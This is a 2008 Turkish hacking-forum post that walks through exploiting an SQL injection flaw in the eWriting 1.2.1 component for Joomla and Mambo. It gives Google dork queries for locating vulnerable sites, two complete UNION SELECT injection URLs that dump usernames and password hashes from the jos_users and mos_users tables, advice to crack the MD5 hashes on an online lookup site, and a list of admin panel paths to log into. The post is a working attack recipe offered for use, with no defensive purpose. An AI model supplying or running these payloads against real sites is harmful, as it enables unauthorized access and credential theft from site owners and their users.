hacked MASTER
Mesaj Sayısı : 199 Kayıt tarihi : 08/03/08
| Konu: Mambo ve Joomla'da Remote SQL Injection Açıkları | Güncel Ptsi Mart 10, 2008 11:47 pm | |
| Bugün Sizlere eWriting 1.2.1 - SQL injection Acigindan bahsedecegim..
Google Arama Kodumuz ; 1) "Powered by eWriting 1.2.1 2) allinurl:"com_ewriting"
Ilk defa Böyle Bir Konu Aciyorum.. Aciklari olan Siteler ; Joomla ve Mambo
Bu Yüzden Iki SQL Injection'umuz Var ;
1)Joomla'daki Sitelerin Acigina Varmak Icin ; HEDEFSITE.COM/index.php?option=com_ewriting&Itemid=9999&func=sel ectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),4,5,6,7,8,9,10+FROM+jos_users-- ================================================== ================================================== ================================================== 2)Mambo'daki Sitelerin Acigina Varmak Icin ; HEDEFSITE.COM/index.php?option=com_ewriting&Itemid=9999&func=sel ectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),4,5,6,7,8,9,10+FROM+mos_users--
Aciklar Etkilidir.. Joomla'da Sonuca varamassaniz Mambo'da deneyiniz (:
Cikan Hashi >> WWW.MD5SEARCH.ORG >> SELECT ALL >> MD5'i GIR >> OK ================================================== ============== Burda Arayabilirsiniz
Site Admin Panelleri www.site.com/admin www.site.com/admin.php www.site.com/administrator www.site.com/administrator.php
Not ;Acik Bana Ait degildir ! Anlatimi Tamamen Bana Aittir, ve izinsiz olarak Baska sitelerde Yayinlanmasi KESINLIKLE Yasaktir!
Saygilarimi Sunarim... | |
|